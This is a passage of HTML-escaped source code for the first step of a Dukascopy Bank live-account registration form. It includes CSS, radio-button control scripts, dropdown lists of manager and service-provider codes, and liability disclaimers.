  .title  {
    text-align:right;
    width:50%;
    padding:2 2 2 2;
    color:#1D4470;
  }
  .field  {
    text-align:left;
    width:50%;
    padding:2 22 2 2;
  }
  .buttons  {
    text-align:center;
    padding:4 4 4 4;
  }
  .button  {
    color:white;
    border:1px outset;
    cursor:pointer;
    background-color:#1D4470;
    width:100px;
    font-weight:bold;
    height:13pt;
  }
  .info  {
    text-align:center;
    padding-left:22;
    padding-right:22;
  }
  input.text  {
    width:100%;
    border-top:1px solid #cccccc;
    border-right:1px solid #cccccc;
    border-bottom:1px solid #cccccc;
    border-left:1px solid #cccccc;
  }
  input.checkbox {

  }
  textarea  {
    width:100%;
    border:1px solid #cccccc;
    font-size:8pt !important;
    font-weight:normal !important;
  }
  select {
    border:1px solid #cccccc;
  }

  .tip {
    position:absolute;
    border: 1px solid #333333;
    background-color: #FFFFE1;
    width: 250px;
    padding: 7px;
    text-align: justify;
    z-index:100;
  }

  &lt;/style&gt;
  &lt;/head&gt;
  &lt;body onLoad=&quot;init();&quot; onBeforeUnload=&quot;showWaiting();&quot; style=&quot;margin:0px;padding:0px;&quot;&gt;
  &lt;div style=&quot;background:url(&apos;https://www.dukascopy.com/pics/topBackground.png&apos;) repeat-x;&quot;&gt;&lt;img src=&quot;https://www.dukascopy.com/pics/headers/website_logo_bank.jpg&quot; alt=&quot;Dukascopy&quot; style=&quot;width:579px;height:103px;border:none;&quot;&gt;&lt;/div&gt;
  &lt;table width=&quot;100%&quot; align=&quot;center&quot; border=&quot;0&quot; cellpadding=&quot;0&quot; cellspacing=&quot;0&quot;&gt;
&lt;form style=&quot;margin:0px;padding:0px;&quot; name=&quot;mainForm&quot; action=&quot;/fo/register/live/index.php&quot; method=&quot;post&quot;&gt;
  &lt;tr&gt;
    &lt;td colspan=&quot;2&quot; class=&quot;header&quot;&gt;
      Client Registration
    &lt;/td&gt;
  &lt;/tr&gt;
  &lt;tr&gt;
    &lt;td colspan=&quot;2&quot; class=&quot;step&quot;&gt;
      Step 1 of 6-12
    &lt;/td&gt;
  &lt;/tr&gt;
  &lt;tr&gt;
    &lt;td colspan=&quot;2&quot;&gt;
      &lt;div class=&quot;error&quot; id=topError&gt;
      	      &lt;div&gt;
    &lt;/td&gt;
  &lt;/tr&gt;
  &lt;tr&gt;
    &lt;td class=&quot;title&quot; valign=&quot;top&quot;&gt;
      Date:
    &lt;/td&gt;
    &lt;td class=&quot;field&quot; valign=&quot;top&quot;&gt;
      Thu, 17 Mar 2011    &lt;/td&gt;
  &lt;/tr&gt;
  &lt;tr&gt;
    &lt;td class=&quot;title&quot; valign=&quot;top&quot;&gt;
      Status:
    &lt;/td&gt;
    &lt;script&gt;
    	function radioClickControll() {
    		var retAcc = document.getElementById(&apos;radio_accountKind_6&apos;);
    		var stAcc  = document.getElementById(&apos;radio_accountKind_7&apos;);
    		var rInd   = document.getElementById(&apos;radio_type_1&apos;);
    		var rJoint = document.getElementById(&apos;radio_type_3&apos;);
    		var rLegal = document.getElementById(&apos;radio_type_2&apos;);

    		if(retAcc.checked) {
    			rLegal.disabled = true;
    		}
    		if(stAcc.checked) {
    			rLegal.disabled = false;
    		}

    		if(rLegal.checked) {
    			retAcc.disabled = true;
    		} 
    		if(rInd.checked || rJoint.checked) { 
    			retAcc.disabled = false;
    		}

    		
    	}
    &lt;/script&gt;
    &lt;td class=&quot;field&quot; valign=&quot;top&quot;&gt;
      &lt;input type=&quot;hidden&quot; name=&quot;aData[STRAT_REF]&quot; value=&quot;-1&quot;&gt;
      &lt;input type=&quot;hidden&quot; name=&quot;aData[FEEDBACK_URL]&quot; value=&quot;-1&quot;&gt;
      &lt;input type=&quot;radio&quot; name=&quot;aData[TYPE]&quot; id=&quot;radio_type_1&quot; value=&quot;1&quot; checked onclick=&quot;radioClickControll()&quot;&gt; &lt;label for=&quot;radio_type_1&quot;&gt;For Individuals&lt;/label&gt;&lt;br/&gt;
      &lt;input type=&quot;radio&quot; name=&quot;aData[TYPE]&quot; id=&quot;radio_type_3&quot; value=&quot;3&quot; onclick=&quot;radioClickControll()&quot;&gt; &lt;label for=&quot;radio_type_3&quot;&gt;For Joint Account&lt;/label&gt;&lt;br/&gt;
      &lt;input type=&quot;radio&quot; name=&quot;aData[TYPE]&quot; id=&quot;radio_type_2&quot; value=&quot;2&quot; onclick=&quot;radioClickControll()&quot;&gt; &lt;label for=&quot;radio_type_2&quot;&gt;For Legal Entities&lt;/label&gt;
    &lt;/td&gt;
  &lt;/tr&gt;
  &lt;tr&gt;
    &lt;td class=&quot;title&quot; valign=&quot;top&quot;&gt;
      Kind of account:
    &lt;/td&gt;
    &lt;td class=&quot;field&quot; valign=&quot;top&quot;&gt;
      &lt;script&gt;
        function fSetManagedAccountStrategyMode(bShown)  {
          oInp = document.getElementById(&apos;sel_managedAccountStrategy&apos;);
          oInp.disabled = !bShown;
          oInp.style.display = (bShown?&quot;&quot;:&quot;none&quot;);
          if(bShown) {
          	document.getElementById(&apos;servProvider0&apos;).checked = false;
          }
        }
        
        function fSetServProviderMode(bShown)  {
          oInp = document.getElementById(&apos;sel_servProvider&apos;);
          oInp.disabled = !bShown;
          oInp.style.display = (bShown?&quot;&quot;:&quot;none&quot;);
          if(bShown) {
          	document.getElementById(&apos;extManContact0&apos;).checked = false;
          } 
        }
      &lt;/script&gt;
      &lt;table border=&quot;0&quot; cellpadding=&quot;1&quot; cellspacing=&quot;0&quot; style=&quot;table-layout:auto;&quot;&gt;
        &lt;tr&gt;
          &lt;td&gt;
            &lt;input type=&quot;radio&quot; name=&quot;aData[accountKind]&quot; value=&quot;&quot; style=display:none checked&gt;
            &lt;input type=&quot;radio&quot; name=&quot;aData[accountKind]&quot; value=&quot;6&quot; id=&quot;radio_accountKind_6&quot;  onClick=&quot;radioClickControll();fSetServProviderMode(false);fSetManagedAccountStrategyMode(false);&quot;&gt;
          &lt;/td&gt;
          &lt;td&gt;
            &lt;label for=&quot;radio_accountKind_6&quot;&gt;Retail Account&lt;/label&gt;
          &lt;/td&gt;
        &lt;/tr&gt;
        
        &lt;tr&gt;
          &lt;td&gt;
            &lt;input type=&quot;radio&quot; name=&quot;aData[accountKind]&quot; value=&quot;7&quot; id=&quot;radio_accountKind_7&quot;   onClick=&quot;radioClickControll();fSetServProviderMode(false);fSetManagedAccountStrategyMode(false);&quot;&gt;
          &lt;/td&gt;
          &lt;td&gt;
            &lt;label for=&quot;radio_accountKind_7&quot;&gt;Standard Account (from 50 000 USD)&lt;/label&gt;
          &lt;/td&gt;
        &lt;/tr&gt;
        
        &lt;tr&gt;
          &lt;td&gt;
            &lt;input type=&quot;radio&quot; name=&quot;aData[accountKind]&quot; value=&quot;100&quot; id=&quot;radio_accountKind_100&quot;  onClick=&quot;fSetServProviderMode(false);fSetManagedAccountStrategyMode(true);&quot;&gt;
          &lt;/td&gt;
          &lt;td&gt;
            &lt;label for=&quot;radio_accountKind_100&quot;&gt;Managed Account&lt;/label&gt;
          &lt;/td&gt;
        &lt;/tr&gt;
        &lt;tr&gt;
        &lt;td&gt;&lt;/td&gt;
          &lt;td valign=&quot;top&quot; id=&quot;sel_managedAccountStrategy&quot; style=&quot;display:none;&quot; disabled&gt;
			          
            &lt;b&gt;Whilst selecting your Manager/Attorney and for convenience purposes only you may use the pull-down menu. Dukascopy has not performed any competence verification or due diligence, does not issue any recommendation concerning your Manager/Attorney and can not be held liable for any losses, direct and indirect damages whether financial or not, resulting from your Manager/Attorney&amp;#039;s acts or omissions.&lt;/b&gt;&lt;br&gt;
            &lt;select name=&quot;aData[managedAccountStrategy]&quot; id=&quot;sel_mas&quot;&gt;
		      &lt;option value=&apos;1ABEM3&apos; &gt;&amp;nbsp;1ABEM3&lt;/option&gt;
&lt;option value=&apos;356JFH1&apos; &gt;&amp;nbsp;356JFH1&lt;/option&gt;
&lt;option value=&apos;356JFH2&apos; &gt;&amp;nbsp;356JFH2&lt;/option&gt;
&lt;option value=&apos;356JFH3&apos; &gt;&amp;nbsp;356JFH3&lt;/option&gt;
&lt;option value=&apos;356JFH4&apos; &gt;&amp;nbsp;356JFH4&lt;/option&gt;
&lt;option value=&apos;356JFH5&apos; &gt;&amp;nbsp;356JFH5&lt;/option&gt;
&lt;option value=&apos;3SFX1&apos; &gt;&amp;nbsp;3SFX1&lt;/option&gt;
&lt;option value=&apos;3SFX2&apos; &gt;&amp;nbsp;3SFX2&lt;/option&gt;
&lt;option value=&apos;45GHKLBV&apos; &gt;&amp;nbsp;45GHKLBV&lt;/option&gt;
&lt;option value=&apos;AADB88&apos; &gt;&amp;nbsp;AADB88&lt;/option&gt;
&lt;option value=&apos;ABBB22&apos; &gt;&amp;nbsp;ABBB22&lt;/option&gt;
&lt;option value=&apos;ABEF73&apos; &gt;&amp;nbsp;ABEF73&lt;/option&gt;
&lt;option value=&apos;AEAC86&apos; &gt;&amp;nbsp;AEAC86&lt;/option&gt;
&lt;option value=&apos;AECC31&apos; &gt;&amp;nbsp;AECC31&lt;/option&gt;
&lt;option value=&apos;ALPX&apos; &gt;&amp;nbsp;ALPX&lt;/option&gt;
&lt;option value=&apos;ALTV&apos; &gt;&amp;nbsp;ALTV&lt;/option&gt;
&lt;option value=&apos;ARCH&apos; &gt;&amp;nbsp;ARCH&lt;/option&gt;
&lt;option value=&apos;ARXX&apos; &gt;&amp;nbsp;ARXX&lt;/option&gt;
&lt;option value=&apos;AZAT681&apos; &gt;&amp;nbsp;AZAT681&lt;/option&gt;
&lt;option value=&apos;Augustan&apos; &gt;&amp;nbsp;Augustan&lt;/option&gt;
&lt;option value=&apos;BABC92&apos; &gt;&amp;nbsp;BABC92&lt;/option&gt;
&lt;option value=&apos;BADF84&apos; &gt;&amp;nbsp;BADF84&lt;/option&gt;
&lt;option value=&apos;BAYWM&apos; &gt;&amp;nbsp;BAYWM&lt;/option&gt;
&lt;option value=&apos;BCAD67&apos; &gt;&amp;nbsp;BCAD67&lt;/option&gt;
&lt;option value=&apos;BCBC72&apos; &gt;&amp;nbsp;BCBC72&lt;/option&gt;
&lt;option value=&apos;BCCA82&apos; &gt;&amp;nbsp;BCCA82&lt;/option&gt;
&lt;option value=&apos;BCEE55&apos; &gt;&amp;nbsp;BCEE55&lt;/option&gt;
&lt;option value=&apos;BDAD35&apos; &gt;&amp;nbsp;BDAD35&lt;/option&gt;
&lt;option value=&apos;BDCC70&apos; &gt;&amp;nbsp;BDCC70&lt;/option&gt;
&lt;option value=&apos;BDCP&apos; &gt;&amp;nbsp;BDCP&lt;/option&gt;
&lt;option value=&apos;BEAD70&apos; &gt;&amp;nbsp;BEAD70&lt;/option&gt;
&lt;option value=&apos;BEAF55&apos; &gt;&amp;nbsp;BEAF55&lt;/option&gt;
&lt;option value=&apos;BECF19&apos; &gt;&amp;nbsp;BECF19&lt;/option&gt;
&lt;option value=&apos;BEDD59&apos; &gt;&amp;nbsp;BEDD59&lt;/option&gt;
&lt;option value=&apos;BEEE43&apos; &gt;&amp;nbsp;BEEE43&lt;/option&gt;
&lt;option value=&apos;BRKIC&apos; &gt;&amp;nbsp;BRKIC&lt;/option&gt;
&lt;option value=&apos;BUSH&apos; &gt;&amp;nbsp;BUSH&lt;/option&gt;
&lt;option value=&apos;BUSH288&apos; &gt;&amp;nbsp;BUSH288&lt;/option&gt;
&lt;option value=&apos;CBFB47&apos; &gt;&amp;nbsp;CBFB47&lt;/option&gt;
&lt;option value=&apos;CCDE32&apos; &gt;&amp;nbsp;CCDE32&lt;/option&gt;
&lt;option value=&apos;CCPFX&apos; &gt;&amp;nbsp;CCPFX&lt;/option&gt;
&lt;option value=&apos;CDCD88&apos; &gt;&amp;nbsp;CDCD88&lt;/option&gt;
&lt;option value=&apos;CDFD34&apos; &gt;&amp;nbsp;CDFD34&lt;/option&gt;
&lt;option value=&apos;CEDD62&apos; &gt;&amp;nbsp;CEDD62&lt;/option&gt;
&lt;option value=&apos;CEFA67&apos; &gt;&amp;nbsp;CEFA67&lt;/option&gt;
&lt;option value=&apos;CEFF58&apos; &gt;&amp;nbsp;CEFF58&lt;/option&gt;
&lt;option value=&apos;CFEC46&apos; &gt;&amp;nbsp;CFEC46&lt;/option&gt;
&lt;option value=&apos;CFFX&apos; &gt;&amp;nbsp;CFFX&lt;/option&gt;
&lt;option value=&apos;CGFX&apos; &gt;&amp;nbsp;CGFX&lt;/option&gt;
&lt;option value=&apos;CHBC&apos; &gt;&amp;nbsp;CHBC&lt;/option&gt;
&lt;option value=&apos;CLMFX&apos; &gt;&amp;nbsp;CLMFX&lt;/option&gt;
&lt;option value=&apos;CurrClub&apos; &gt;&amp;nbsp;CurrClub&lt;/option&gt;
&lt;option value=&apos;DADD65&apos; &gt;&amp;nbsp;DADD65&lt;/option&gt;
&lt;option value=&apos;DBAA26&apos; &gt;&amp;nbsp;DBAA26&lt;/option&gt;
&lt;option value=&apos;DBAF77&apos; &gt;&amp;nbsp;DBAF77&lt;/option&gt;
&lt;option value=&apos;DBFB93&apos; &gt;&amp;nbsp;DBFB93&lt;/option&gt;
&lt;option value=&apos;DCCD84&apos; &gt;&amp;nbsp;DCCD84&lt;/option&gt;
&lt;option value=&apos;DCEC93&apos; &gt;&amp;nbsp;DCEC93&lt;/option&gt;
&lt;option value=&apos;DDBF26&apos; &gt;&amp;nbsp;DDBF26&lt;/option&gt;
&lt;option value=&apos;DDCC49&apos; &gt;&amp;nbsp;DDCC49&lt;/option&gt;
&lt;option value=&apos;DDDB32&apos; &gt;&amp;nbsp;DDDB32&lt;/option&gt;
&lt;option value=&apos;DEFD33&apos; &gt;&amp;nbsp;DEFD33&lt;/option&gt;
&lt;option value=&apos;DF56NB&apos; &gt;&amp;nbsp;DF56NB&lt;/option&gt;
&lt;option value=&apos;DF794J0&apos; &gt;&amp;nbsp;DF794J0&lt;/option&gt;
&lt;option value=&apos;DFAF50&apos; &gt;&amp;nbsp;DFAF50&lt;/option&gt;
&lt;option value=&apos;DG785&apos; &gt;&amp;nbsp;DG785&lt;/option&gt;
&lt;option value=&apos;DOXX&apos; &gt;&amp;nbsp;DOXX&lt;/option&gt;
&lt;option value=&apos;DRFX1&apos; &gt;&amp;nbsp;DRFX1&lt;/option&gt;
&lt;option value=&apos;DSBP&apos; &gt;&amp;nbsp;DSBP&lt;/option&gt;
&lt;option value=&apos;EACE93&apos; &gt;&amp;nbsp;EACE93&lt;/option&gt;
&lt;option value=&apos;EADA74&apos; &gt;&amp;nbsp;EADA74&lt;/option&gt;
&lt;option value=&apos;EAEE21&apos; &gt;&amp;nbsp;EAEE21&lt;/option&gt;
&lt;option value=&apos;EAFD36&apos; &gt;&amp;nbsp;EAFD36&lt;/option&gt;
&lt;option value=&apos;EBAD44&apos; &gt;&amp;nbsp;EBAD44&lt;/option&gt;
&lt;option value=&apos;EBBB34&apos; &gt;&amp;nbsp;EBBB34&lt;/option&gt;
&lt;option value=&apos;EBDE90&apos; &gt;&amp;nbsp;EBDE90&lt;/option&gt;
&lt;option value=&apos;ECURRENTZ&apos; &gt;&amp;nbsp;ECURRENTZ&lt;/option&gt;
&lt;option value=&apos;EDCC46&apos; &gt;&amp;nbsp;EDCC46&lt;/option&gt;
&lt;option value=&apos;EFAF70&apos; &gt;&amp;nbsp;EFAF70&lt;/option&gt;
&lt;option value=&apos;EFBB17&apos; &gt;&amp;nbsp;EFBB17&lt;/option&gt;
&lt;option value=&apos;EFCA50&apos; &gt;&amp;nbsp;EFCA50&lt;/option&gt;
&lt;option value=&apos;EFCA92&apos; &gt;&amp;nbsp;EFCA92&lt;/option&gt;
&lt;option value=&apos;FAAC62&apos; &gt;&amp;nbsp;FAAC62&lt;/option&gt;
&lt;option value=&apos;FBDB80&apos; &gt;&amp;nbsp;FBDB80&lt;/option&gt;
&lt;option value=&apos;FBDF30&apos; &gt;&amp;nbsp;FBDF30&lt;/option&gt;
&lt;option value=&apos;FBED79&apos; &gt;&amp;nbsp;FBED79&lt;/option&gt;
&lt;option value=&apos;FBFA65&apos; &gt;&amp;nbsp;FBFA65&lt;/option&gt;
&lt;option value=&apos;FCCA80&apos; &gt;&amp;nbsp;FCCA80&lt;/option&gt;
&lt;option value=&apos;FDAG&apos; &gt;&amp;nbsp;FDAG&lt;/option&gt;
&lt;option value=&apos;FEEC47&apos; &gt;&amp;nbsp;FEEC47&lt;/option&gt;
&lt;option value=&apos;FFFF98&apos; &gt;&amp;nbsp;FFFF98&lt;/option&gt;
&lt;option value=&apos;FGB1WFM&apos; &gt;&amp;nbsp;FGB1WFM&lt;/option&gt;
&lt;option value=&apos;FGH7GB&apos; &gt;&amp;nbsp;FGH7GB&lt;/option&gt;
&lt;option value=&apos;FGH90IK&apos; &gt;&amp;nbsp;FGH90IK&lt;/option&gt;
&lt;option value=&apos;FIBX1&apos; &gt;&amp;nbsp;FIBX1&lt;/option&gt;
&lt;option value=&apos;FORMA&apos; &gt;&amp;nbsp;FORMA&lt;/option&gt;
&lt;option value=&apos;FORT&apos; &gt;&amp;nbsp;FORT&lt;/option&gt;
&lt;option value=&apos;FRAPX&apos; &gt;&amp;nbsp;FRAPX&lt;/option&gt;
&lt;option value=&apos;FTAM&apos; &gt;&amp;nbsp;FTAM&lt;/option&gt;
&lt;option value=&apos;FXDASH1A&apos; &gt;&amp;nbsp;FXDASH1A&lt;/option&gt;
&lt;option value=&apos;FXG1&apos; &gt;&amp;nbsp;FXG1&lt;/option&gt;
&lt;option value=&apos;FXMN&apos; &gt;&amp;nbsp;FXMN&lt;/option&gt;
&lt;option value=&apos;FXPOR&apos; &gt;&amp;nbsp;FXPOR&lt;/option&gt;
&lt;option value=&apos;FXRGC&apos; &gt;&amp;nbsp;FXRGC&lt;/option&gt;
&lt;option value=&apos;G7NV&apos; &gt;&amp;nbsp;G7NV&lt;/option&gt;
&lt;option value=&apos;GHJKL76&apos; &gt;&amp;nbsp;GHJKL76&lt;/option&gt;
&lt;option value=&apos;GLCM&apos; &gt;&amp;nbsp;GLCM&lt;/option&gt;
&lt;option value=&apos;GSYE&apos; &gt;&amp;nbsp;GSYE&lt;/option&gt;
&lt;option value=&apos;GTG67H&apos; &gt;&amp;nbsp;GTG67H&lt;/option&gt;
&lt;option value=&apos;GTXX&apos; &gt;&amp;nbsp;GTXX&lt;/option&gt;
&lt;option value=&apos;HJH768&apos; &gt;&amp;nbsp;HJH768&lt;/option&gt;
&lt;option value=&apos;HKJBXF&apos; &gt;&amp;nbsp;HKJBXF&lt;/option&gt;
&lt;option value=&apos;HRAPX&apos; &gt;&amp;nbsp;HRAPX&lt;/option&gt;
&lt;option value=&apos;HUSK&apos; &gt;&amp;nbsp;HUSK&lt;/option&gt;
&lt;option value=&apos;IDTX&apos; &gt;&amp;nbsp;IDTX&lt;/option&gt;
&lt;option value=&apos;IDTX1&apos; &gt;&amp;nbsp;IDTX1&lt;/option&gt;
&lt;option value=&apos;IDTX2&apos; &gt;&amp;nbsp;IDTX2&lt;/option&gt;
&lt;option value=&apos;IDTX3&apos; &gt;&amp;nbsp;IDTX3&lt;/option&gt;
&lt;option value=&apos;INHH&apos; &gt;&amp;nbsp;INHH&lt;/option&gt;
&lt;option value=&apos;ITASCA&apos; &gt;&amp;nbsp;ITASCA&lt;/option&gt;
&lt;option value=&apos;JDCFX&apos; &gt;&amp;nbsp;JDCFX&lt;/option&gt;
&lt;option value=&apos;JLS&apos; &gt;&amp;nbsp;JLS&lt;/option&gt;
&lt;option value=&apos;JSDM&apos; &gt;&amp;nbsp;JSDM&lt;/option&gt;
&lt;option value=&apos;KRCM1&apos; &gt;&amp;nbsp;KRCM1&lt;/option&gt;
&lt;option value=&apos;KRCM2&apos; &gt;&amp;nbsp;KRCM2&lt;/option&gt;
&lt;option value=&apos;LBMFX&apos; &gt;&amp;nbsp;LBMFX&lt;/option&gt;
&lt;option value=&apos;LBXX2&apos; &gt;&amp;nbsp;LBXX2&lt;/option&gt;
&lt;option value=&apos;LMXX&apos; &gt;&amp;nbsp;LMXX&lt;/option&gt;
&lt;option value=&apos;LivIn&apos; &gt;&amp;nbsp;LivIn&lt;/option&gt;
&lt;option value=&apos;MASI&apos; &gt;&amp;nbsp;MASI&lt;/option&gt;
&lt;option value=&apos;MBCM&apos; &gt;&amp;nbsp;MBCM&lt;/option&gt;
&lt;option value=&apos;MBCO&apos; &gt;&amp;nbsp;MBCO&lt;/option&gt;
&lt;option value=&apos;MDLV&apos; &gt;&amp;nbsp;MDLV&lt;/option&gt;
&lt;option value=&apos;MEIDAO&apos; &gt;&amp;nbsp;MEIDAO&lt;/option&gt;
&lt;option value=&apos;NK71&apos; &gt;&amp;nbsp;NK71&lt;/option&gt;
&lt;option value=&apos;NKHFX&apos; &gt;&amp;nbsp;NKHFX&lt;/option&gt;
&lt;option value=&apos;OANFx5&apos; &gt;&amp;nbsp;OANFx5&lt;/option&gt;
&lt;option value=&apos;OANFx55&apos; &gt;&amp;nbsp;OANFx55&lt;/option&gt;
&lt;option value=&apos;OGFX&apos; &gt;&amp;nbsp;OGFX&lt;/option&gt;
&lt;option value=&apos;PAXX&apos; &gt;&amp;nbsp;PAXX&lt;/option&gt;
&lt;option value=&apos;PORFX&apos; &gt;&amp;nbsp;PORFX&lt;/option&gt;
&lt;option value=&apos;PRSP&apos; &gt;&amp;nbsp;PRSP&lt;/option&gt;
&lt;option value=&apos;PURK1&apos; &gt;&amp;nbsp;PURK1&lt;/option&gt;
&lt;option value=&apos;RGCSR&apos; &gt;&amp;nbsp;RGCSR&lt;/option&gt;
&lt;option value=&apos;RJPFX&apos; &gt;&amp;nbsp;RJPFX&lt;/option&gt;
&lt;option value=&apos;RMJ&apos; &gt;&amp;nbsp;RMJ&lt;/option&gt;
&lt;option value=&apos;RNKFX&apos; &gt;&amp;nbsp;RNKFX&lt;/option&gt;
&lt;option value=&apos;ROXX&apos; &gt;&amp;nbsp;ROXX&lt;/option&gt;
&lt;option value=&apos;RSFX&apos; &gt;&amp;nbsp;RSFX&lt;/option&gt;
&lt;option value=&apos;RUSLION&apos; &gt;&amp;nbsp;RUSLION&lt;/option&gt;
&lt;option value=&apos;Rio2016&apos; &gt;&amp;nbsp;Rio2016&lt;/option&gt;
&lt;option value=&apos;SARK&apos; &gt;&amp;nbsp;SARK&lt;/option&gt;
&lt;option value=&apos;SEP1&apos; &gt;&amp;nbsp;SEP1&lt;/option&gt;
&lt;option value=&apos;SKUSN&apos; &gt;&amp;nbsp;SKUSN&lt;/option&gt;
&lt;option value=&apos;SMXX&apos; &gt;&amp;nbsp;SMXX&lt;/option&gt;
&lt;option value=&apos;SOUK&apos; &gt;&amp;nbsp;SOUK&lt;/option&gt;
&lt;option value=&apos;SRVFX&apos; &gt;&amp;nbsp;SRVFX&lt;/option&gt;
&lt;option value=&apos;STAC&apos; &gt;&amp;nbsp;STAC&lt;/option&gt;
&lt;option value=&apos;STAR+&apos; &gt;&amp;nbsp;STAR+&lt;/option&gt;
&lt;option value=&apos;SVTL&apos; &gt;&amp;nbsp;SVTL&lt;/option&gt;
&lt;option value=&apos;TC4ET&apos; &gt;&amp;nbsp;TC4ET&lt;/option&gt;
&lt;option value=&apos;TFGINC&apos; &gt;&amp;nbsp;TFGINC&lt;/option&gt;
&lt;option value=&apos;VASCON1&apos; &gt;&amp;nbsp;VASCON1&lt;/option&gt;
&lt;option value=&apos;VASCON2&apos; &gt;&amp;nbsp;VASCON2&lt;/option&gt;
&lt;option value=&apos;VASCON3&apos; &gt;&amp;nbsp;VASCON3&lt;/option&gt;
&lt;option value=&apos;VFGL5112&apos; &gt;&amp;nbsp;VFGL5112&lt;/option&gt;
&lt;option value=&apos;VHGLNM678&apos; &gt;&amp;nbsp;VHGLNM678&lt;/option&gt;
&lt;option value=&apos;VKCS52&apos; &gt;&amp;nbsp;VKCS52&lt;/option&gt;
&lt;option value=&apos;VNG409CG&apos; &gt;&amp;nbsp;VNG409CG&lt;/option&gt;
&lt;option value=&apos;Vulov10&apos; &gt;&amp;nbsp;Vulov10&lt;/option&gt;
&lt;option value=&apos;W2WFX&apos; &gt;&amp;nbsp;W2WFX&lt;/option&gt;
&lt;option value=&apos;WDFX&apos; &gt;&amp;nbsp;WDFX&lt;/option&gt;
&lt;option value=&apos;WDFX2&apos; &gt;&amp;nbsp;WDFX2&lt;/option&gt;
&lt;option value=&apos;WDXX&apos; &gt;&amp;nbsp;WDXX&lt;/option&gt;
&lt;option value=&apos;XYWFX&apos; &gt;&amp;nbsp;XYWFX&lt;/option&gt;
  
            &lt;/select&gt;&lt;br&gt;
			&lt;p&gt;&lt;input type=&quot;checkbox&quot; name=&quot;aData[extManAnswer]&quot; value=&quot;Yes&quot; id=extManContact0&gt;&lt;label for=extManContact0&gt; - &lt;b&gt;I expressly confirm that the selection/appointment of the External Manager is my own initiative without any recommendation from Dukascopy Bank SA. I have proceeded to a due diligence on the External Manager and will keep Dukascopy Bank SA harmless and fully indemnified against any and all losses, direct and indirect damages whether financial or not, resulting from my External Manager&amp;#039;s acts or omissions.&lt;/b&gt;&lt;/label&gt;
			&lt;/p&gt;&lt;br&gt;
          &lt;/td&gt;
        &lt;/tr&gt;

        &lt;tr&gt;
          &lt;td&gt;
            &lt;input type=&quot;radio&quot; name=&quot;aData[accountKind]&quot; value=&quot;200&quot; id=&quot;radio_accountKind_200&quot;  onClick=&quot;fSetServProviderMode(true);fSetManagedAccountStrategyMode(false);&quot;&gt;
          &lt;/td&gt;
          &lt;td&gt;
            &lt;label for=&quot;radio_accountKind_200&quot;&gt;Service Provider&lt;/label&gt;
          &lt;/td&gt;
        &lt;/tr&gt;
        &lt;tr&gt;
        &lt;td&gt;&lt;/td&gt;
          &lt;td valign=&quot;top&quot; id=&quot;sel_servProvider&quot; style=&quot;display:none;&quot; disabled&gt;
			          
            &lt;b&gt;Whilst selecting your Service Provider and for convenience purposes only you may use the pull-down menu. Dukascopy has not performed any competence verification or due diligence, does not issue any recommendation concerning your Service Provider and can not be held liable for any losses, direct and indirect damages whether financial or not, resulting from your Service Provider&amp;#039;s acts or omissions.&lt;/b&gt;&lt;br&gt;
            &lt;select name=&quot;aData[serviceProvider]&quot; id=&quot;sel_mas2&quot;&gt;
		      &lt;option value=&apos;BBAC47&apos; &gt;&amp;nbsp;BBAC47&lt;/option&gt;
&lt;option value=&apos;BUSH1&apos; &gt;&amp;nbsp;BUSH1&lt;/option&gt;
&lt;option value=&apos;BUSH2&apos; &gt;&amp;nbsp;BUSH2&lt;/option&gt;
&lt;option value=&apos;GNM87FV&apos; &gt;&amp;nbsp;GNM87FV&lt;/option&gt;
&lt;option value=&apos;KRC1&apos; &gt;&amp;nbsp;KRC1&lt;/option&gt;
&lt;option value=&apos;KRC2&apos; &gt;&amp;nbsp;KRC2&lt;/option&gt;
&lt;option value=&apos;KRC3&apos; &gt;&amp;nbsp;KRC3&lt;/option&gt;
&lt;option value=&apos;TINL&apos; &gt;&amp;nbsp;TINL&lt;/option&gt;
&lt;option value=&apos;ZUXX&apos; &gt;&amp;nbsp;ZUXX&lt;/option&gt;
  
            &lt;/select&gt;&lt;br&gt;
			&lt;p&gt;&lt;input type=&quot;checkbox&quot; name=&quot;aData[servProviderAnswer]&quot; value=&quot;Yes&quot; id=servProvider0&gt;&lt;label for=servProvider0&gt; - &lt;b&gt;I expressly confirm that the selection/appointment of the Service Provider is my own initiative without any recommendation from Dukascopy Bank SA. I have proceeded to a due diligence on the Service Provider and will keep Dukascopy Bank SA harmless and fully indemnified against any and all losses, direct and indirect damages whether financial or not, resulting from my Service Provider&amp;#039;s acts or omissions. I hereby acknowledge and agree that Dukascopy Bank SA may communicate my UIN and e-mail address to the Service Provider.&lt;/b&gt;&lt;/label&gt;
			&lt;/p&gt;				
          &lt;/td&gt;
        &lt;/tr&gt;

      &lt;/table&gt;
    &lt;/td&gt;
  &lt;/tr&gt;
  &lt;tr&gt;
     &lt;td colspan=&quot;2&quot; align=&quot;center&quot;&gt;
     &lt;div id=&quot;infoWTXX&quot;&gt;        
      &lt;/div&gt;
      &lt;/td&gt;
  &lt;/tr&gt;
  &lt;tr&gt;
    &lt;td colspan=&quot;2&quot; class=&quot;buttons&quot;&gt;
      &lt;input class=&quot;button&quot; type=&quot;submit&quot; name=&quot;next&quot; value=&quot;Submit&quot;&gt;
    &lt;/td&gt;
  &lt;/tr&gt;
  &lt;tr&gt;
    &lt;td colspan=&quot;2&quot; class=&quot;info&quot; style=&quot;padding:20 0 0 0;&quot;&gt;
  MINIMUM AMOUNT TO BE DEPOSITED&lt;br/&gt;TO OPEN A LIVE TRADING ACCOUNT IS 1 000 USD&lt;br/&gt;
(OR ITS EQUIVALENT IN OTHER CURRENCIES).&lt;br/&gt;
&lt;br/&gt;&lt;b&gt;Filling the application form, please use Latin letters only!&lt;/b&gt;&lt;br/&gt;
&lt;br/&gt;&lt;br/&gt;&lt;br/&gt;&lt;br/&gt;
	&lt;/td&gt;
  &lt;/tr&gt;
&lt;input type=&quot;hidden&quot; name=&quot;aData[HTTP_REFERER]&quot; value=&quot;3&quot;&gt;&lt;input type=&quot;hidden&quot; name=&quot;backFormMarker&quot; value=&quot;&quot;&gt;&lt;input type=&quot;hidden&quot; name=&quot;currentFormMarker&quot; value=&quot;step1&quot;&gt;&lt;input type=&quot;hidden&quot; name=&quot;nextFormMarker&quot; value=&quot;step2&quot;&gt;&lt;span style=display:none; id=hidHtmlConvert&gt;&lt;/span&gt;&lt;script&gt;
                function fFillFormField (oElement, value)    {
                    try {
                        switch(oElement.tagName) {
                            case &quot;TEXTAREA&quot;:
                            case &quot;TEXT&quot;:
                            	document.getElementById(&apos;hidHtmlConvert&apos;).innerHTML = value; 
                            	oElement.value = document.getElementById(&apos;hidHtmlConvert&apos;).innerHTML; 
								// oElement.value = value;
                            break;
                            case &quot;SELECT&quot;:
